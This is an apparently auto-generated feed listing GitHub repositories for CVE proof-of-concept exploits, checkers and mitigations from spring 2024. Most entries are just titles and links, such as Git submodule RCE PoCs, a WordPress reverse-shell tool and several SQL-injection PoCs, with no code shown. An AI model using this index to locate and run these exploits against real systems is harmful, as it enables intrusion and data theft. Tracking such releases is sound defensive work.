**no description** : [Hoanle396/CVE-2021-44228-demo](https://github.com/Hoanle396/CVE-2021-44228-demo) create time: 2024-05-28T13:40:20Z

**Microsoft Windows 'HTTP.sys' - Remote Code Execution** : [Cappricio-Securities/CVE-2015-1635](https://github.com/Cappricio-Securities/CVE-2015-1635) create time: 2024-05-28T10:41:07Z

**no description** : [Goplush/CVE-2024-32002-git-rce](https://github.com/Goplush/CVE-2024-32002-git-rce) create time: 2024-05-28T05:27:23Z

**The Country State City Dropdown CF7 WordPress plugin (versions up to 2.7.2) is vulnerable to SQL Injection via 'cnt' and 'sid' parameters. Insufficient escaping and lack of preparation in the SQL query allow unauthenticated attackers to append queries, potentially extracting sensitive database information.** : [zomasec/CVE-2024-3495-POC](https://github.com/zomasec/CVE-2024-3495-POC) create time: 2024-05-28T02:57:12Z

**no description** : [0ptyx/cve-2024-0582](https://github.com/0ptyx/cve-2024-0582) create time: 2024-05-28T01:06:48Z

**no description** : [Jhonsonwannaa/CVE-2017-5487](https://github.com/Jhonsonwannaa/CVE-2017-5487) create time: 2024-05-27T21:19:33Z

**CVE-2019-10092: Limited Cross-Site Scripting in "Proxy Error" Page** : [mbadanoiu/CVE-2019-10092](https://github.com/mbadanoiu/CVE-2019-10092) create time: 2024-05-27T20:09:36Z

**Wordpress** : [Jhonsonwannaa/Jhonsonwannaa-CVE-2017-5487](https://github.com/Jhonsonwannaa/Jhonsonwannaa-CVE-2017-5487) create time: 2024-05-27T19:58:46Z

**Exploit for CVE-2023-38646, a pre-auth RCE in Metbase** : [xchg-rax-rax/CVE-2023-38646](https://github.com/xchg-rax-rax/CVE-2023-38646) create time: 2024-05-27T19:56:46Z

**no description** : [c0deur/CVE-2023-51385](https://github.com/c0deur/CVE-2023-51385) create time: 2024-05-27T19:29:55Z

**Hash Form – Drag & Drop Form Builder <= 1.1.0 - Unauthenticated Arbitrary File Upload to Remote Code Execution** : [Chocapikk/CVE-2024-5084](https://github.com/Chocapikk/CVE-2024-5084) create time: 2024-05-27T20:04:10Z

**Wordpress** : [Jhonsonwannaa/CVE-2017-5487](https://github.com/Jhonsonwannaa/CVE-2017-5487) create time: 2024-05-27T18:21:47Z

**no description** : [huyennhat-dev/cve-2023-34040](https://github.com/huyennhat-dev/cve-2023-34040) create time: 2024-05-27T15:57:03Z

**CVE-2024-3552 Web Directory Free <= 1.6.9 - Unauthenticated SQL Injection** : [truonghuuphuc/CVE-2024-3552-Poc](https://github.com/truonghuuphuc/CVE-2024-3552-Poc) create time: 2024-05-27T15:36:24Z

**Apache Tomcat - Open Redirect** : [Cappricio-Securities/CVE-2018-11784](https://github.com/Cappricio-Securities/CVE-2018-11784) create time: 2024-05-27T14:28:30Z

**Reverse Shell POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253), PHP Code Injection** : [nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253) create time: 2024-05-27T15:10:12Z

**no description** : [eoslvs/CVE-2024-4956](https://github.com/eoslvs/CVE-2024-4956) create time: 2024-05-27T13:48:15Z

**This project generates DNS zonefiles with custom NSEC3 parameters to reproduce and evaluate the attacks in CVE-2023-50868.** : [Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack](https://github.com/Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack) create time: 2024-03-19T16:13:14Z

**Poc for CVE-2023-30253** : [04Shivam/CVE-2023-30253-Exploit](https://github.com/04Shivam/CVE-2023-30253-Exploit) create time: 2024-05-27T11:00:43Z

**no description** : [phucrio/CVE-2024-21683-RCE](https://github.com/phucrio/CVE-2024-21683-RCE) create time: 2024-05-27T11:14:54Z

**Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()** : [ambionics/cnext-exploits](https://github.com/ambionics/cnext-exploits) create time: 2024-05-27T08:30:06Z

**CVE-2024-4367 mitigation for Odoo 14.0** : [avalahEE/pdfjs_disable_eval](https://github.com/avalahEE/pdfjs_disable_eval) create time: 2024-05-23T07:34:15Z

**CVE-2024-30056 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability** : [absholi7ly/Microsoft-Edge-Information-Disclosure](https://github.com/absholi7ly/Microsoft-Edge-Information-Disclosure) create time: 2024-05-27T06:37:34Z

**Automated CVE 2022 35914 Checker** : [joelindra/htmlawedchekcer](https://github.com/joelindra/htmlawedchekcer) create time: 2024-05-27T04:25:12Z

**TeamCity CVE-2023-42793 exploit written in Rust** : [junnythemarksman/CVE-2023-42793](https://github.com/junnythemarksman/CVE-2023-42793) create time: 2024-05-27T03:31:57Z

**no description** : [thinhap/CVE-2024-4956-PoC](https://github.com/thinhap/CVE-2024-4956-PoC) create time: 2024-05-27T03:09:36Z

**Apache OFBiz Authentication Bypass Vulnerability (CVE-2023-51467 and CVE-2023-49070)** : [pulentoski/CVE-2023-51467-and-CVE-2023-49070](https://github.com/pulentoski/CVE-2023-51467-and-CVE-2023-49070) create time: 2024-05-27T01:40:50Z

**no description** : [kaikai145154/CVE-2024](https://github.com/kaikai145154/CVE-2024) create time: 2024-05-27T01:48:39Z

**changedetection rce though ssti** : [zcrosman/cve-2024-32651](https://github.com/zcrosman/cve-2024-32651) create time: 2024-05-26T21:24:14Z

**CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Unauthenticated SQL Injection via listingfields Parameter** : [truonghuuphuc/CVE-2024-4443-Poc](https://github.com/truonghuuphuc/CVE-2024-4443-Poc) create time: 2024-05-26T16:34:58Z

**Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: RCE** : [W01fh4cker/CVE-2024-22120-RCE](https://github.com/W01fh4cker/CVE-2024-22120-RCE) create time: 2024-05-20T03:29:09Z

**no description** : [jweny/CVE-2024-32002_EXP](https://github.com/jweny/CVE-2024-32002_EXP) create time: 2024-05-20T02:58:57Z

**no description** : [jweny/CVE-2024-32002_HOOK](https://github.com/jweny/CVE-2024-32002_HOOK) create time: 2024-05-20T02:52:42Z

**CVE-2024-32002-hook** : [10cks/hook](https://github.com/10cks/hook) create time: 2024-05-20T02:44:07Z

**WordPress WPS Hide Login <1.9.1 - Information Disclosure** : [Cappricio-Securities/CVE-2021-24917](https://github.com/Cappricio-Securities/CVE-2021-24917) create time: 2024-05-20T02:07:52Z

**no description** : [ymuraki-csc/cve-2024-3435](https://github.com/ymuraki-csc/cve-2024-3435) create time: 2024-05-20T02:17:44Z

**A oxidized version of https://github.com/nettitude/CVE-2024-20356/blob/main/CVE-2024-20356.py** : [SherllyNeo/CVE_2024_20356](https://github.com/SherllyNeo/CVE_2024_20356) create time: 2024-05-20T00:57:01Z

**CVE-2021-22205 exploit script** : [cc3305/CVE-2021-22205](https://github.com/cc3305/CVE-2021-22205) create time: 2024-05-19T23:14:48Z

**A exploit script for CVE-2021-3129** : [cc3305/CVE-2021-3129](https://github.com/cc3305/CVE-2021-3129) create time: 2024-05-19T21:25:25Z

**An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.** : [Chocapikk/CVE-2024-29269](https://github.com/Chocapikk/CVE-2024-29269) create time: 2024-05-19T19:05:00Z

**no description** : [aitorcastel/poc_CVE-2024-32002_submodule](https://github.com/aitorcastel/poc_CVE-2024-32002_submodule) create time: 2024-05-19T16:34:11Z

**no description** : [aitorcastel/poc_CVE-2024-32002](https://github.com/aitorcastel/poc_CVE-2024-32002) create time: 2024-05-19T16:33:35Z

**no description** : [Wadewfsssss/CVE-2024-32004](https://github.com/Wadewfsssss/CVE-2024-32004) create time: 2024-05-19T13:57:46Z

**Windows Server 2003 & IIS 6.0 - Remote Code Execution** : [Cappricio-Securities/CVE-2017-7269](https://github.com/Cappricio-Securities/CVE-2017-7269) create time: 2024-05-19T13:01:33Z

**no description** : [iwallarm/cve-2024-3400](https://github.com/iwallarm/cve-2024-3400) create time: 2024-05-19T12:38:04Z

**WordPress Contact Form 7 - Unrestricted File Upload** : [Cappricio-Securities/CVE-2020-35489](https://github.com/Cappricio-Securities/CVE-2020-35489) create time: 2024-05-19T12:26:59Z

**Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal** : [Cappricio-Securities/CVE-2020-3187](https://github.com/Cappricio-Securities/CVE-2020-3187) create time: 2024-05-19T11:32:36Z

**Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery** : [Cappricio-Securities/CVE-2021-40438](https://github.com/Cappricio-Securities/CVE-2021-40438) create time: 2024-05-19T11:04:58Z

**no description** : [Laihoang2k3/CVE_2019_5736](https://github.com/Laihoang2k3/CVE_2019_5736) create time: 2024-05-19T09:22:27Z

**no description** : [X-Projetion/Exploiting-PwnKit-CVE-2021-4034-](https://github.com/X-Projetion/Exploiting-PwnKit-CVE-2021-4034-) create time: 2024-05-19T08:58:00Z

**no description** : [Laihoang2k3/CVE_2019_14271](https://github.com/Laihoang2k3/CVE_2019_14271) create time: 2024-05-19T07:17:55Z

**Hook for the PoC for exploiting CVE-2024-32002** : [amalmurali47/hook](https://github.com/amalmurali47/hook) create time: 2024-05-17T19:35:44Z

**Exploit PoC for CVE-2024-32002** : [amalmurali47/git_rce](https://github.com/amalmurali47/git_rce) create time: 2024-05-17T19:33:08Z

**CVE_2019_14271** : [Laihoang2k3/CVE_2019_14271](https://github.com/Laihoang2k3/CVE_2019_14271) create time: 2024-05-19T06:06:29Z

**no description** : [10cks/CVE-2024-32002-linux-smash](https://github.com/10cks/CVE-2024-32002-linux-smash) create time: 2024-05-19T05:32:34Z

**no description** : [10cks/CVE-2024-32002-linux-submod](https://github.com/10cks/CVE-2024-32002-linux-submod) create time: 2024-05-19T05:32:08Z

**no description** : [10cks/CVE-2024-32002-linux-hulk](https://github.com/10cks/CVE-2024-32002-linux-hulk) create time: 2024-05-19T05:31:41Z

**no description** : [10cks/CVE-2024-32002-smash](https://github.com/10cks/CVE-2024-32002-smash) create time: 2024-05-19T05:08:36Z

**no description** : [10cks/CVE-2024-32002-submod](https://github.com/10cks/CVE-2024-32002-submod) create time: 2024-05-19T05:08:22Z

**no description** : [10cks/CVE-2024-32002-hulk](https://github.com/10cks/CVE-2024-32002-hulk) create time: 2024-05-19T05:08:08Z

**no description** : [10cks/CVE-2024-32002-POC](https://github.com/10cks/CVE-2024-32002-POC) create time: 2024-05-19T05:05:07Z

**Python3 version of CVE:2015-1397** : [47Cid/Magento-Shoplift-SQLI](https://github.com/47Cid/Magento-Shoplift-SQLI) create time: 2024-05-18T21:42:55Z

**A PoC exploit for CVE-2014-6271 - Shellshock** : [K3ysTr0K3R/CVE-2014-6271-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2014-6271-EXPLOIT) create time: 2024-05-18T19:42:58Z

**Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.** : [Zombie-Kaiser/CVE-2024-21338-x64-build-](https://github.com/Zombie-Kaiser/CVE-2024-21338-x64-build-) create time: 2024-05-18T15:38:34Z

**no description** : [M507/CVE-2024-32002](https://github.com/M507/CVE-2024-32002) create time: 2024-05-18T02:42:33Z

**CVE-2024-32002 RCE PoC** : [safebuffer/CVE-2024-32002](https://github.com/safebuffer/CVE-2024-32002) create time: 2024-05-18T15:05:28Z

**CVE-2024-27972 WP Fusion Lite <= 3.41.24 - Authenticated (Contributor+) Remote Code Execution** : [truonghuuphuc/CVE-2024-27972-Poc](https://github.com/truonghuuphuc/CVE-2024-27972-Poc) create time: 2024-05-18T14:17:34Z

**CVE-2023-45540 Jorani Leave Management System v1.0.3 – HTML Injection** : [soundarkutty/CVE-2023-45540](https://github.com/soundarkutty/CVE-2023-45540) create time: 2023-10-06T12:43:54Z

**no description** : [WHOISshuvam/CVE-2015-1397](https://github.com/WHOISshuvam/CVE-2015-1397) create time: 2024-05-18T02:37:26Z

**no description** : [aitorcastel/git-submodule-cve-2024-32002](https://github.com/aitorcastel/git-submodule-cve-2024-32002) create time: 2024-05-18T02:42:14Z

**no description** : [aitorcastel/git-cve-2024-32002](https://github.com/aitorcastel/git-cve-2024-32002) create time: 2024-05-18T02:39:58Z

**CVE-2023-4596 Vulnerable Exploit and Checker Version** : [X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version](https://github.com/X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version) create time: 2024-05-18T01:39:12Z

**no description** : [10cks/CVE-2024-27460-installer](https://github.com/10cks/CVE-2024-27460-installer) create time: 2024-05-18T02:25:11Z

**CVE-2024-29895 | RCE on CACTI 1.3.X dev** : [Rubioo02/CVE-2024-29895](https://github.com/Rubioo02/CVE-2024-29895) create time: 2024-05-17T22:03:29Z

**A simulation of CVE-2020-27252 for CSC699.** : [OccultSlolem/GatorMed](https://github.com/OccultSlolem/GatorMed) create time: 2024-05-17T20:35:56Z

**CVE-2018-6574-go-get-RCE** : [Dannners/CVE-2018-6574-go-get-RCE](https://github.com/Dannners/CVE-2018-6574-go-get-RCE) create time: 2024-05-17T17:30:06Z

**A submodule for exploiting CVE-2024-32002 vulnerability.** : [markuta/hooky](https://github.com/markuta/hooky) create time: 2024-05-17T15:37:42Z

**no description** : [0x3f3c/CVE-2024-32640-SQLI-MuraCMS](https://github.com/0x3f3c/CVE-2024-32640-SQLI-MuraCMS) create time: 2024-05-17T13:43:59Z

**PoC for CVE-2024-27130** : [watchtowrlabs/CVE-2024-27130](https://github.com/watchtowrlabs/CVE-2024-27130) create time: 2024-05-17T07:58:01Z

**CVE-2022-22978漏洞实例代码** : [wan9xx/CVE-2022-22978-demo](https://github.com/wan9xx/CVE-2022-22978-demo) create time: 2024-05-17T07:26:54Z

**no description** : [10cks/CVE-2024-21111-del](https://github.com/10cks/CVE-2024-21111-del) create time: 2024-05-17T03:09:54Z

**(CVE-2024-33559) The XStore theme for WordPress is vulnerable to SQL Injection due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query** : [absholi7ly/WordPress-XStore-theme-SQL-Injection](https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection) create time: 2024-05-17T04:15:34Z

**CVE-2024-31974** : [actuator/com.solarized.firedown](https://github.com/actuator/com.solarized.firedown) create time: 2024-05-17T02:02:00Z

**CVE-2019-9054 exploit added support for python3 + bug fixes** : [FedericoTorres233/CVE-2019-9053-Fixed](https://github.com/FedericoTorres233/CVE-2019-9053-Fixed) create time: 2024-05-17T00:33:54Z

**obride with CVE-2018-25075** : [epicosy/obridge](https://github.com/epicosy/obridge) create time: 2024-05-16T20:59:32Z

**tac_plus Pre-Auth Remote Command Execution Vulnerability (CVE-2023-45239 & CVE-2023-48643)** : [takeshixx/tac_plus-pre-auth-rce](https://github.com/takeshixx/tac_plus-pre-auth-rce) create time: 2024-04-29T18:48:57Z

**no description** : [ticofookfook/CVE-2024-29895.py](https://github.com/ticofookfook/CVE-2024-29895.py) create time: 2024-05-16T20:03:03Z

**CVE-2016-10033 Wordpress 4.6 Exploit** : [ElnurBDa/CVE-2016-10033](https://github.com/ElnurBDa/CVE-2016-10033) create time: 2024-05-16T18:56:39Z

**no description** : [Disseminator/CVE-2024-32002](https://github.com/Disseminator/CVE-2024-32002) create time: 2024-05-16T17:25:09Z

**no description** : [Disseminator/submodule-CVE-2024-32002](https://github.com/Disseminator/submodule-CVE-2024-32002) create time: 2024-05-16T16:44:37Z

**no description** : [Disseminator/CVE-2024-32002](https://github.com/Disseminator/CVE-2024-32002) create time: 2024-05-16T16:44:18Z

**CVE-2024-21306 BadBlue implementation (Using DuckyScript)** : [PhucHauDeveloper/BadbBlue](https://github.com/PhucHauDeveloper/BadbBlue) create time: 2024-05-06T02:05:02Z

**no description** : [Disseminator/submodule-CVE-2024-32002](https://github.com/Disseminator/submodule-CVE-2024-32002) create time: 2024-05-16T15:14:50Z

**no description** : [Disseminator/CVE-2024-32002](https://github.com/Disseminator/CVE-2024-32002) create time: 2024-05-16T15:00:28Z

**CVE-2024-4352 Tutor LMS Pro <= 2.7.0 - Missing Authorization to SQL Injection** : [truonghuuphuc/CVE-2024-4352-Poc](https://github.com/truonghuuphuc/CVE-2024-4352-Poc) create time: 2024-05-16T14:55:43Z

**no description** : [silent6trinity/CVE-2024-34582](https://github.com/silent6trinity/CVE-2024-34582) create time: 2024-05-16T12:40:46Z

**Demonstration of CVE-2020-0601 aka curveball. Based on the PoC's available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall** : [JoelBts/CVE-2020-0601_PoC](https://github.com/JoelBts/CVE-2020-0601_PoC) create time: 2024-05-16T12:32:44Z

**Poc para explotar la vulnerabilidad CVE-2024-23897 en versiones 2.441 y anteriores de Jenkins, mediante la cual podremos leer archivos internos del sistema sin estar autenticados** : [Maalfer/CVE-2024-23897](https://github.com/Maalfer/CVE-2024-23897) create time: 2024-05-16T09:32:51Z

**Cacti CVE-2024-29895 POC** : [secunnix/CVE-2024-29895](https://github.com/secunnix/CVE-2024-29895) create time: 2024-05-16T06:29:21Z

**no description** : [geozin/POC-CVE-2018-25031](https://github.com/geozin/POC-CVE-2018-25031) create time: 2024-05-15T23:21:58Z

**no description** : [Stuub/CVE-2024-32640-SQLI-MuraCMS](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS) create time: 2024-05-16T01:02:32Z

**C# / .NET version of CVE-2023-21768** : [xboxoneresearch/CVE-2023-21768-dotnet](https://github.com/xboxoneresearch/CVE-2023-21768-dotnet) create time: 2024-05-15T17:42:10Z

**CVE digunakan untuk mengidentifikasi kerentanan keamanan pada perangkat lunak dan perangkat keras2. CVE memungkinkan pengguna untuk mencari dan memperbaiki kerentanan keamanan pada sistem mereka2.** : [Yoga913/CVE-2024-CISCO](https://github.com/Yoga913/CVE-2024-CISCO) create time: 2024-05-15T17:27:32Z

**Statis analysis of the RTCore64 associated with Micro-Star MSI Afterburner version 4.6.2.15658 + POC** : [1X14720f130x/CVE-2019-1609](https://github.com/1X14720f130x/CVE-2019-1609) create time: 2024-05-15T16:08:33Z

**Find rows contain specific IP addresses in large files and then, extract them. This tool make for investigating logs for cve-2024-3400** : [tk-sawada/IPLineFinder](https://github.com/tk-sawada/IPLineFinder) create time: 2024-05-15T15:50:32Z

**Plantronics Desktop Hub LPE** : [xct/CVE-2024-27460](https://github.com/xct/CVE-2024-27460) create time: 2024-05-12T09:53:07Z

**no description** : [Stuub/CVE-2024-29895-CactiRCE-PoC](https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC) create time: 2024-05-15T13:11:45Z

**Exploit POC for CVE-2024-22026 affecting Ivanti EPMM "MobileIron Core"** : [securekomodo/CVE-2024-22026](https://github.com/securekomodo/CVE-2024-22026) create time: 2024-05-15T11:20:45Z

**no description** : [W3BW/CVE-2024-27956-RCE-File-Package](https://github.com/W3BW/CVE-2024-27956-RCE-File-Package) create time: 2024-05-15T07:48:54Z

**PoC for CVE-2018-14716** : [0xB455/CVE-2018-14716](https://github.com/0xB455/CVE-2018-14716) create time: 2024-05-15T06:47:02Z

**PoC for CVE-2021-34646** : [0xB455/CVE-2021-34646](https://github.com/0xB455/CVE-2021-34646) create time: 2024-05-15T06:35:42Z

**no description** : [aelmokhtar/CVE-2024-34716_PoC](https://github.com/aelmokhtar/CVE-2024-34716_PoC) create time: 2024-05-14T18:48:41Z

**High CVE-2024-4761 Exploit** : [michredteam/CVE-2024-4761](https://github.com/michredteam/CVE-2024-4761) create time: 2024-05-14T17:45:22Z

**Checker for CVE-2021-3156 with static version check** : [lypd0/CVE-2021-3156-checker](https://github.com/lypd0/CVE-2021-3156-checker) create time: 2024-05-14T16:35:09Z

**CVE-2020-27838 - KeyCloak - Information Exposure** : [Cappricio-Securities/CVE-2020-27838](https://github.com/Cappricio-Securities/CVE-2020-27838) create time: 2024-05-14T15:50:16Z

**WordPress Auto Admin Account Creation and Reverse Shell cve-2024-27956 automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries** : [AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956](https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956) create time: 2024-05-14T14:21:49Z

**POC for CVE-2024-27804** : [R00tkitSMM/CVE-2024-27804](https://github.com/R00tkitSMM/CVE-2024-27804) create time: 2024-05-14T14:17:06Z

**no description** : [momo1239/CVE-2024-XYZA](https://github.com/momo1239/CVE-2024-XYZA) create time: 2024-05-14T13:02:36Z

**no description** : [jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit](https://github.com/jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit) create time: 2024-05-14T11:22:35Z

**no description** : [krnidhi/frameworks_base_AOSP10_r33_CVE-2023-21285](https://github.com/krnidhi/frameworks_base_AOSP10_r33_CVE-2023-21285) create time: 2024-05-14T07:12:19Z

**no description** : [momo1239/CVE-2023-24203-and-CVE-2023-24204](https://github.com/momo1239/CVE-2023-24203-and-CVE-2023-24204) create time: 2024-05-14T03:53:03Z

**no description** : [GRTMALDET/Big-IP-Next-CVE-2024-26026](https://github.com/GRTMALDET/Big-IP-Next-CVE-2024-26026) create time: 2024-05-13T22:04:01Z

**Soluciona a CVE-2021-1678 - RpcAuthnLevelPrivacyEnabled** : [alvaciroliveira/RpcAuthnLevelPrivacyEnabled](https://github.com/alvaciroliveira/RpcAuthnLevelPrivacyEnabled) create time: 2024-05-13T20:19:38Z

**PoC for the NAPLISTENER exploit: https://nvd.nist.gov/vuln/detail/CVE-2023-22527** : [ttate10/CVE-2023-22527](https://github.com/ttate10/CVE-2023-22527) create time: 2024-05-13T21:04:45Z

**A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.** : [1ncendium/CVE-2024-4040](https://github.com/1ncendium/CVE-2024-4040) create time: 2024-05-13T17:33:36Z

**Update python3 exploit for CVE-2018-10583 (LibreOffice/Open Office - '.odt' Information Disclosure )** : [octodi/CVE-2018-10583](https://github.com/octodi/CVE-2018-10583) create time: 2024-05-13T17:13:17Z

**That's a PoC of cve-2023-40000. Wordpress LiteSpeed Cache exploit.** : [iveresk/cve-2023-40000](https://github.com/iveresk/cve-2023-40000) create time: 2024-05-13T15:25:58Z

**A version of the PoC for CVE-2021-31630 from https://github.com/Hunt3r0x/CVE-2021-31630-HTB but without the political messages, because they are unneccessary.** : [sealldeveloper/CVE-2021-31630-PoC](https://github.com/sealldeveloper/CVE-2021-31630-PoC) create time: 2024-05-13T15:17:38Z

**POC for CVE-2024-4701** : [JoeBeeton/CVE-2024-4701-POC](https://github.com/JoeBeeton/CVE-2024-4701-POC) create time: 2024-05-13T11:58:19Z

**HP Plantronics Hub 3.2.1 Updater Privilege Escalation** : [Alaatk/CVE-2024-27460](https://github.com/Alaatk/CVE-2024-27460) create time: 2024-05-13T11:15:14Z

**no description** : [alas1n/eslint-nextjs-cve-2024-34351-detector](https://github.com/alas1n/eslint-nextjs-cve-2024-34351-detector) create time: 2024-05-13T09:51:57Z

**no description** : [huyqa/CVE-2023-33733](https://github.com/huyqa/CVE-2023-33733) create time: 2024-05-13T02:01:17Z

**no description** : [restdone/CVE-2024-31771](https://github.com/restdone/CVE-2024-31771) create time: 2024-04-10T17:09:34Z

**Nuclei Templates** : [DiabloHTB/Nuclei-Template-CVE-2024-1561](https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561) create time: 2024-05-12T19:55:53Z

**no description** : [andrelia-hacks/CVE-2024-3400](https://github.com/andrelia-hacks/CVE-2024-3400) create time: 2024-05-12T19:48:20Z

**no description** : [Voorivex/CVE-2024-34351](https://github.com/Voorivex/CVE-2024-34351) create time: 2024-05-12T10:49:41Z

**Write-up's of some research I've done** : [Gray-0men/CVE-2024-22774](https://github.com/Gray-0men/CVE-2024-22774) create time: 2024-03-24T05:59:57Z

**PoC for XSS vulnerability in the LiteSpeed Cache WordPress plugin (CVE-2023-40000) allowing elevated privileges. Includes code, explanations, and mitigations.** : [quantiom/litespeed-cache-xss-poc](https://github.com/quantiom/litespeed-cache-xss-poc) create time: 2024-05-12T06:13:47Z

**no description** : [truonghuuphuc/CVE-2024-32523-Poc](https://github.com/truonghuuphuc/CVE-2024-32523-Poc) create time: 2024-05-11T18:16:31Z

**Poc for CVE-2024-1561 affecting Gradio 4.12.0** : [DiabloHTB/CVE-2024-1561](https://github.com/DiabloHTB/CVE-2024-1561) create time: 2024-05-11T13:44:46Z

**Tool for finding CVE-2023-27524 (Apache Superset - Authentication Bypass)** : [Cappricio-Securities/CVE-2023-2752](https://github.com/Cappricio-Securities/CVE-2023-2752) create time: 2024-05-11T12:29:08Z

**Tool for finding CVE-2023-27524 (Apache Superset - Authentication Bypass)** : [karthi-the-hacker/CVE-2023-27524](https://github.com/karthi-the-hacker/CVE-2023-27524) create time: 2024-05-11T12:19:55Z

**no description** : [th3Hellion/CVE-2024-21413](https://github.com/th3Hellion/CVE-2024-21413) create time: 2024-05-11T12:28:22Z

**CVE-2024-34226 | SQL injection** : [dovankha/CVE-2024-34226](https://github.com/dovankha/CVE-2024-34226) create time: 2024-05-11T10:33:04Z

**CVE-20240-34225 | Cross Site Scripting** : [dovankha/CVE-2024-34225](https://github.com/dovankha/CVE-2024-34225) create time: 2024-05-11T10:20:52Z

**CVE-2024-34224 | Cross Site Scripting** : [dovankha/CVE-2024-34224](https://github.com/dovankha/CVE-2024-34224) create time: 2024-05-11T08:58:31Z

**CVE-2024-34223 | Insecure permission** : [dovankha/CVE-2024-34223](https://github.com/dovankha/CVE-2024-34223) create time: 2024-05-11T08:36:16Z

**CVE-2024-34222 | SQL injection** : [dovankha/CVE-2024-34222](https://github.com/dovankha/CVE-2024-34222) create time: 2024-05-11T08:20:55Z

**CVE-2024-34221 | Insecure pemission** : [dovankha/CVE-2024-34221](https://github.com/dovankha/CVE-2024-34221) create time: 2024-05-09T10:32:30Z

**no description** : [Chapoly1305/CVE-2023-46870](https://github.com/Chapoly1305/CVE-2023-46870) create time: 2024-05-10T22:18:53Z

**no description** : [truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc](https://github.com/truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc) create time: 2024-05-10T16:13:07Z

**no description** : [rasan2001/CVE-2019-0708](https://github.com/rasan2001/CVE-2019-0708) create time: 2024-05-10T16:09:48Z

**no description** : [rasan2001/CVE-2022-29072](https://github.com/rasan2001/CVE-2022-29072) create time: 2024-05-10T16:13:15Z

**no description** : [rasan2001/CVE-2023-27350](https://github.com/rasan2001/CVE-2023-27350) create time: 2024-05-10T16:14:22Z

**Proof Of Concept that exploits PuTTy CVE-2024-31497.** : [HugoBond/CVE-2024-31497-POC](https://github.com/HugoBond/CVE-2024-31497-POC) create time: 2024-05-10T14:30:50Z

**Exploit "TinyFree" for CVE-2023-49606-Poc POC** : [rezardoss/CVE-2023-49606-Poc](https://github.com/rezardoss/CVE-2023-49606-Poc) create time: 2024-05-10T13:19:53Z

**CVE-2024-34310** : [3309899621/CVE-2024-34310](https://github.com/3309899621/CVE-2024-34310) create time: 2024-05-10T13:36:19Z

**Exploit "TinyFree" for CVE-2023-49606 Poc** : [rezardoss/CVE-2023-49606-POC](https://github.com/rezardoss/CVE-2023-49606-POC) create time: 2024-05-10T10:47:00Z

**Shelly is a lightweight and efficient vulnerability scanner designed to identify and mitigate Shellshock (CVE-2014-6271 & CVE-2014-7169) vulnerabilities in Bash environments.** : [ajansha/shellshock](https://github.com/ajansha/shellshock) create time: 2024-05-10T08:13:06Z

**CVE-2024-24787 Proof of Concept** : [LOURC0D3/CVE-2024-24787-PoC](https://github.com/LOURC0D3/CVE-2024-24787-PoC) create time: 2024-05-10T07:45:51Z

**no description** : [jrbH4CK/CVE-2021-41091](https://github.com/jrbH4CK/CVE-2021-41091) create time: 2024-05-10T04:42:35Z

**no description** : [FoxyProxys/CVE-2023-52654](https://github.com/FoxyProxys/CVE-2023-52654) create time: 2024-05-09T20:53:03Z

**Config files for my GitHub profile.** : [CVERMA2007/CVERMA2007](https://github.com/CVERMA2007/CVERMA2007) create time: 2024-05-09T18:29:26Z

**no description** : [xbz0n/CVE-2024-0399](https://github.com/xbz0n/CVE-2024-0399) create time: 2024-05-09T18:21:42Z

**no description** : [xbz0n/CVE-2024-0566](https://github.com/xbz0n/CVE-2024-0566) create time: 2024-05-09T17:30:24Z

**GUI Exploit Tool for CVE-2020-0688** : [W01fh4cker/CVE-2020-0688-GUI](https://github.com/W01fh4cker/CVE-2020-0688-GUI) create time: 2024-05-09T12:50:48Z

**CVE-2024-28279** : [unrealjbr/CVE-2024-28279](https://github.com/unrealjbr/CVE-2024-28279) create time: 2024-05-09T12:40:53Z

**CVE-2024-28277** : [unrealjbr/CVE-2024-28277](https://github.com/unrealjbr/CVE-2024-28277) create time: 2024-05-09T12:37:30Z

**CVE-2024-28276** : [unrealjbr/CVE-2024-28276](https://github.com/unrealjbr/CVE-2024-28276) create time: 2024-05-09T12:28:53Z

**no description** : [nancyariah4/CVE-2024-27956](https://github.com/nancyariah4/CVE-2024-27956) create time: 2024-05-09T12:07:14Z

**no description** : [batmoshka55/CVE-2018-9995_dvr_credentials](https://github.com/batmoshka55/CVE-2018-9995_dvr_credentials) create time: 2024-05-09T09:03:42Z

**no description** : [dovankha/CVE-2024-34220](https://github.com/dovankha/CVE-2024-34220) create time: 2024-04-27T10:32:10Z

